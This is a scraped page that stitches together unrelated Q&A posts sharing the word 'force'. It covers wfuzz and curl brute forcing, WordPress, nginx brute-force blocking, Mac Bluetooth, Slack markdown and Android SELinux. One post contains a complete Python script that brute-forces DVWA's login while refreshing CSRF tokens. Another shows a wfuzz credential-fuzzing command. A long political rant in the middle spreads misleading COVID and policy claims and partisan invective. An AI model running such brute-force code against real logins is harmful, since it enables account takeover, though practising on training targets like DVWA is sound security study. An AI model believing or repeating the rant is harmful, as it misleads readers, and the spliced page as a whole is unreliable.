brute force – curl to wfuzz translation

I am trying to run wfuzz to match the curl command, which works. I know valid credentials, but it doesn’t seem to pass them properly.

wfuzz -c -w user -w pass -b "session=cookie" --digest FUZZ:FUZ2Z ""

(user and pass files contain user and pass accordingly)

curl -c cookie --digest -u user:pass

The target is running Gunicorn web server

custom post types – Force documents to appear in Featured Image dialogue

Having a perplexing issue… …for a custom post-type called ‘Resources’ I used the ‘Featured Image’ or ‘thumbnail’ function within WordPress to allow users to attach documents to ‘Resources’. The process itself works exactly as expected and anticipated.

However, setting the site up, someone made a mistake and uploaded two documents and assigned them to the wrong ‘Resources’. So Resource A -> Document B and Resource B -> Document A.

When attempting to switch them and clicking ‘Edit Featured Image’ you are unable to see any of the documents. They clicked ‘Remove Featured Image’ and then ‘Set Featured Image’ and when the dialogue opens, still no documents.

In the WordPress Media Library all of the uploaded and attached documents are there. Visible, with previews, etc. As expected. Here’s the first two rows of the Media Library. You can see tons of PDFs that have been successfully uploaded.

The only place where this issue appears is that in the actual ‘Featured Image’ media dialogue box, WordPress will not display any PDFs.

Here’s the CPT supports segment:

$rsc_supports = array(

Like I said, everything works perfectly – even uploading and attaching PDFs as ‘thumbnails’ to be associated as attachments with the CPT. When a PDF is attached and you ‘Click to edit’ the dialogue opens up and you can see the attached PDF in the list.
The only failing is that the ‘Featured Image’ modal/pop-up/dialogue box that loads, is designed to filter out everything except images.
This is what that dialogue box looks like on a ‘Resource’ with nothing attached.

However, if you view another Resource that does have a PDF already attached, you get this:

I have tried the filtering and date dropdown and they don’t address this.

I believe this is by design. So my question is, “How do I modify that dialogue box to display all files rather than just images?”

brute force attacks – Block bruteforce attempts with nginx & cloudflare without rate limiting

So I discovered servers trying to bruteforce my API so I want to block them…but my specific scenario made it difficult to work with common solutions found on the internet.

1] I don't want to just rate limit. If any IP attempts to authenticate with the API and fails more than X times in ~6 hours, I want to block them. No answers anymore at all. Not even 429 replies.

2] I'm using cloudflare, so I need to use the CF IP header

3] I can't block the traffic based on iptables or similar solutions, since the only IPs that talk to my server are cloudflare IPs

4] The API generates nginx errors if the authentication fails with `2: no such file or directory` if that helps with something

Given my scenario, what are the possible solutions?
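
One way to meet the four constraints above, as an added example that is not part of the original post: count failed logins per CF-Connecting-IP over a sliding 6-hour window from the nginx access log, then emit an nginx map so blocked clients get `return 444` (connection closed, no reply). The log format, the 401 status for failed authentication, the threshold of 5, the `/api/login` path and the `$blocked_client` variable name are all assumptions.

```python
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(hours=6)  # the "~6 hours" from the question
MAX_FAILS = 5                # the question's "X"; 5 is an assumed value

# Assumed access-log format (not from the post):
#   log_format auth '$http_cf_connecting_ip [$time_iso8601] "$request" $status';
LINE = re.compile(r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3})$')

def offenders(lines, max_fails=MAX_FAILS, window=WINDOW):
    """Return sorted client IPs with more than max_fails 401s inside one window."""
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    blocked = set()
    for line in lines:
        m = LINE.match(line.strip())
        if not m or m["status"] != "401":  # 401 = failed auth (assumed)
            continue
        try:
            # Treat the header as untrusted text: only a parsed address
            # is ever written into nginx configuration.
            ip = str(ipaddress.ip_address(m["ip"]))
            ts = datetime.fromisoformat(m["ts"])
        except ValueError:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) > max_fails:
            blocked.add(ip)
    return sorted(blocked)

def nginx_map(ips):
    """Render a map for http{}; pair it with: if ($blocked_client) { return 444; }"""
    rows = "".join(f'    "{ip}" 1;\n' for ip in ips)
    return ("map $http_cf_connecting_ip $blocked_client {\n"
            "    default 0;\n" + rows + "}\n")

# Constructed sample lines using documentation address ranges.
REQ = '"POST /api/login HTTP/1.1"'  # hypothetical endpoint
SAMPLE = [f"203.0.113.7 [2020-06-01T10:{m:02d}:00+00:00] {REQ} 401" for m in range(6)]
SAMPLE += [f"198.51.100.9 [2020-06-01T{h:02d}:00:00+00:00] {REQ} 401" for h in range(0, 24, 2)]
SAMPLE += [f"192.0.2.4 [2020-06-01T10:00:00+00:00] {REQ} 200"]

if __name__ == "__main__":
    print(nginx_map(offenders(SAMPLE)))
```

Because nginx drops only the connection from Cloudflare, the blocked client receives a Cloudflare-generated error page rather than nothing. Restrict the origin to Cloudflare's address ranges so the header cannot be supplied by a direct connection.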

Force bluetooth usb adapter Mac Catalina

I’m having trouble forcing my mac to stay connected to my external USB Bluetooth adapter on reboot/restart.

I’ve read quite a few posts and have found this command

sudo nvram bluetoothHostControllerSwitchBehavior=always

I was able to use Bluetooth Explorer and I switched it to the new bluetooth USB dongle but it will still not remain connected after reboot. Instead it remains disconnected and I have to reconnect it every time I restart my computer.

Is there another command that I can use that will keep it connected after reboot?

Do you think all the George Floyd riots and protests will cause a Coronavirus spike and force us into another 3 months of economic shutdown?

They’re telling the experts & (D) who said believe the science that their science is pointless with people who have nothing better to do because of grounding shutdowns. Officer Derek Chauvin got carried away & forgot that he doesn’t live in Haiti, Liberia, South Sudan, Venezuela, N. Africa, Middle East, Brazil & even Mexico where it is routine for cops to shoot 1st & ask questions later, especially if the suspect is a well known career criminal.


Criminals released by the thousands due to COVID-19 concerns & have been re-offending since their release, saw an opportunity along gang members, ANTIFA & easily influenced millennials. De Blasio was surprised that criminals that were released were reoffending & Los Angeles Police Chief warned the public that thousands of criminals will re-commit crimes. Criminals having impunity is the transition towards Venezuelan Socialism for supporting the socialist regime. (D)s have been setting the stage for Socialism since 2007. No justice no peace is a call for criminals to wreak havoc, not protest. Abuse of authority certainly calls for protest, but this is not a protest. These are criminals, thugs, thieves & arsonists as described by Obama when he was in office. It’s ironic that celebrities, politicians, & protestors support abuse of authority carried out by Comey, Brenan, Clapper, Obama, Lynch, Rice, Nadler, Schitt… Supporting a preferred abuse of power will turn the USA into Sub Saharan ruled countries, Haiti, ISIS Caliphate, Venezuela, San Salvador, Brazil & even Mexico where corruption is rampant & a way of life.

Sweden revered as a socialist success did not take the socialist approach of shutting down their economy as they knew COVID-19 isn’t apocalyptic & will spread no matter how (D)s & partisan news media makes it apocalyptic while the young & healthy rarely affected keeps the economy stable. Doctor Dan Erickson analyzed & exposed the natural & pre-existing conditions deaths are being classified as COVID-19 death, & Influenza deaths are likely being counted as well.

Worldwide Deaths from 01/01/20 – 04/04/20: COVID-19 59,226, Seasonal Flu 125,352, Water Related Diseases 217,099, Malaria 252,878, Suicides 276,480, Road Accidents 348,044, HIV/AIDS 433,382, Alcohol 644,785, Smoking 1,288,753, Cancer 2,117,316, Hunger 2,883,497

AOC work boycott & (D)s would rather have the middle class & working poor unemployed & out of business empowering (D) congress with leverage to exploit the situation as more foreigners are brought in to replace 40% millions of unemployed US citizens from the pandemic. At some point the country & the world will need to cope & live with COVID-19 along other diseases that are far more lethal & incurable than COVID-19. With an incubation period of 2 weeks, 6 weeks quarantine/shutdown is more than enough & should’ve transitioned to targeted shutdown. The world is still dealing with HIV, EBOLA (99% mortality), Hepatitis C & Syphilis without a vaccine. Shutdowns for more than a couple of months will put 280 million US folks in poverty. A year shutdown will put 320 Million Americans in poverty where the government will have to nationalize the industries, private property, & public individualism inducing famine, unproductivity, desperations & deaths.

Despite how American socialists (Sanders & the squad) brand their socialism as Democratic Socialist to mask their true intentions to achieving the end goal of Socialist state control of the economy, industry, property & public by bureaucratic regulations. Everything they propose such as public education (free & mediocre) & universal single payer healthcare (rationed) is straight up USSR, Cuba & Venezuela’s play book which Sanders lauds & defends. (Venezuela was praised as Democratic Socialist that was actually Communist with its bureaucrats pillaging oil revenues). These socialist countries don’t have state of the art Hospitals & Cadillac Gov. Assist. for all (only 0.0001%) because there isn’t enough funds & man power regardless of how much industries are taxed & nationalized. Ultimately all concept or branding of socialism leads to Government owned property of industries, housing, farms, people, long working hours, & NO: dissenting free speech, entrepreneurship, competition, varieties in brands or materials with very little individuality, motivation, & productivity.

In a Socialist country it is very hard to impossible to be a Millionaire when socialists like Bernie & AOC will take 90% of an entrepreneurs wealth, income, & property. Sanders always touts Sweden (less densely populated homogenous country) as a socialist success where Millionaires & Billionaires thrives from the middle class & the working poor being the ones funding most gov. assistance in Sweden. Bernie & AOC will use every means of pressure & influence in advancing the Green New Deal’s socialist agenda funded by the top 21% ($Millionaires/$Billionaires) turning that into the top 0.0001% for the US economy & society to permanently mirror Cuba, Venezuela & N. Korea eliminating most of the rich (except elites in government) & all middle class to exist as income among the rich, middle & poor are flattened to the lowest level.

Lesson for America: Sweden is not Socialist

A nationwide 75% economic shutdown to essentials only is a communist model economy from a pandemic or warfare that plunges 1st world economies into a depression for socialism to take hold & permanently take over under the Green New Deal (New Communist Manifesto). Anyone who has lived & escaped Venezuela knows this feeling, once all Industries & Private Properties are nationalized. Senate/House (D)s Green New Deal will shape America’s economy in line with Venezuela & Cuba where bureaucrats control the economy & profits (ripe for corruptions). Everyone will either be working for the government assigned jobs deemed necessary, or unemployed on rationed gov. assistance & rent free dilapidated apartment in disrepair.

Bernie & AOC’s Green New Deal is designed to destroy America from within & the intent of 3rd world socialist countries to prosper, but only 2nd – 8th largest adversarial or rival countries will. The military will become very ineffective so the US can’t be SAVIORS or police of the world. The United States would be ripe for the Taking or break apart into 50 or 10 separate independent countries as its defensive arsenals of carbon emitting internal combustion engines, rocket engines, Jet engines, bombs, missiles, cannon powder… would be out of commission. AOC want to dissolve Homeland Security & the Military so that customs, Coast Guard, Navy, Army, & Airforce can’t defend against Drug Cartels, Drug Mules, Drug Dealers, Human Traffickers, Criminal Gangs, Common Criminals, ISIS or Al Qaeda operatives like the Boston Marathon Bomber (Tsarnaev), San Bernardino shooter (Farook), & Florida gay bar shooter (Mateen).

As the hospitalization curve has been flattened & minimized to safely open in 3 phases, (D) States Governors are doing all they can to prolong the shutdowns seeing the pandemic as an opportunity to erase decades long debt & mismanagement they have incurred from spending more than the high taxes they collect as they scheme with (D) Congress (has power of purse) for a bailout & print endless money regardless of how much the US dollar will deflate in value taking a page from the Venezuelan & Zimbabwean model where $1 is a Trillion in Zimbabwean & Venezuelan currency. The pandemic is resetting the world nations’ economies, but 1st world countries have the means to bounce back with their infrastructures in logistic, manufacturing, retail, natural resources, academics, engineering & science. Due to crimes, corruption, & brain drain of special skill, 3rd world economies have no chance to surpass 1st world economies.…………

Brute Force HIGH DVWA with Python Script

I’m new to Python and I’m trying to brute-force DVWA at the High level. I found this script from . But this error always pops up when I execute it. Any help is welcome, thank you.


File "", line 32, in
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
IndexError: list index out of range

Whole Script:

from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup
# give our arguments more semantic friendly names
script, filename, success_message = argv
txt = open(filename)
# set up our target, cookie and session
url = ''
cookie = {'security': 'high', 'PHPSESSID':'b8dgqhbue8vdinrd87leug1no1'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)
# @param: html (String)
# Searches the response HTML for our specified success message
def checkSuccess(html):
 # get our soup ready for searching
 soup = Soup(html)
 # check for our success message in the soup
 search = soup.findAll(text=success_message)

 if not search:
  success = False
 else:
  success = True
 # return the brute force result
 return success
# Get the initial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source)
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
# Loop through our provided password file
with open(filename) as f:
 print 'Running brute force attack...'
 for password in f:
  # setup the payload
  payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
  r = s.get(url, cookies=cookie, params=payload)
  success = checkSuccess(r.text)
  if not success:
   # if it failed the CSRF token will be changed. Get the new one
   soup = Soup(r.text)
   csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
  else:
   # Success! Show the result
   print 'Password is: ' + password
   break
 # We failed, bummer.
 if not success:
  print 'Brute force failed. No matches found.'

How to force Slack to apply markdown within a word?

Slack has “recently” introduced its somewhat annoying WYSIWYG “message composer”, which breaks the message formatting with the inline markdown. Fortunately there is now also an option called “format messages with markup” which kind of reverts this feature back to normal, but…

I would like to know, how to force this inline markdown interpreter to work also in the middle of words. For example, how to achieve these:



Apparently, the following:



do not work. There must be a separator before/after ~ or `, but if a space is used, it’s no longer a single word 🙁 Is there any “invisible” (and simply reachable) character Slack would accept as a separator which we could use for this purpose?

How to force SELinux to permissive even when setenforce 0 is not working and kernel was 100% permissive when flashed?

I don’t know what to do. I’m using a Samsung Note 3 (Exynos) – N900 with the custom Resurrection Remix 5.8.5 ROM (Android 7.1.2) with its own permissive kernel, rooted with Magisk. Yesterday it turned to enforcing status, then SPenCommand stopped working. And when I tried to setenforce 0 in the terminal, it gave me the error: invalid argument. I don’t want to flash the phone again; backup takes a lot of time, as well as restoring, because I have a very old PC and I flashed it on a friend’s laptop, who is now 50 miles away and won’t come just because of this (my computer still uses a USB 1.1 interface – I know it’s garbage but it’s been working for 15 years stable). Any suggestions on how to do it on the phone itself would be helpful. Please help me, somebody 🙂
